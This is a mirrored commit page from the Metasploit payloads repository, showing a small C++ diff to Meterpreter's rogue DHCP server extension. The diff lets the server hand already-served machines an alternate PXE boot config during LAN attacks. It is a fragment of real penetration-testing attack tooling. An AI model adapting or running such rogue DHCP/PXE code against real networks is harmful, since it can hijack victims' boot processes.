github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-02-16 00:24:29 +01:00
Code Releases Activity

Fixes #5312 for pivoted PXE attacks.

Browse Source 
git-svn-id: file:///home/svn/framework3/trunk@13634 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Matt Weeks 2011-08-25 02:07:35 +00:00
parent 7ce649587b
commit 3432cf5f69
1 changed files with 9 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
c/meterpreter/source/extensions/lanattacks/dhcpserv.cpp
View File

@ -222,6 +222,9 @@ int DHCPserv::run(){
string pxeConfigFile("update2");
stringOptionCheck(&pxeConfigFile, "PXECONF");
string pxeAltConfigFile("update0");
stringOptionCheck(&pxeAltConfigFile, "PXEALTCONF");
string pxePathPrefix("");
//get DHCP parameters
unsigned int leaseTime = 600;
@ -336,10 +339,6 @@ int DHCPserv::run(){
if (messageType == DHCPDiscover){ //DHCP Discover - send DHCP Offer
pkt << DHCPOffer;
// check if already served based on hw addr (MAC address)
if (serveOnce == true && served.count(clienthwaddr) > 0)
continue; //Already served; allowing normal boot
}else if (messageType == DHCPRequest){ //DHCP Request - send DHCP ACK
pkt << DHCPAck;
@ -360,7 +359,12 @@ int DHCPserv::run(){
pkt << dhcpoption(OpDns, iton(dnsServer));
string pxemagic(PXEMagic,4);
pkt << dhcpoption(OpPXEMagic, pxemagic);
pkt << dhcpoption(OpPXEConfigFile, pxeConfigFile);
// check if already served based on hw addr (MAC address)
if (serveOnce == true && served.count(clienthwaddr) > 0)
pkt << dhcpoption(OpPXEConfigFile, pxeAltConfigFile); //Already served; allowing normal boot
else
pkt << dhcpoption(OpPXEConfigFile, pxeConfigFile);
pkt << dhcpoption(OpPXEPathPrefix, pxePathPrefix);
pkt << dhcpoption(OpPXERebootTime, iton(pxeRebootTime));
if ( hostname.length() > 0 ){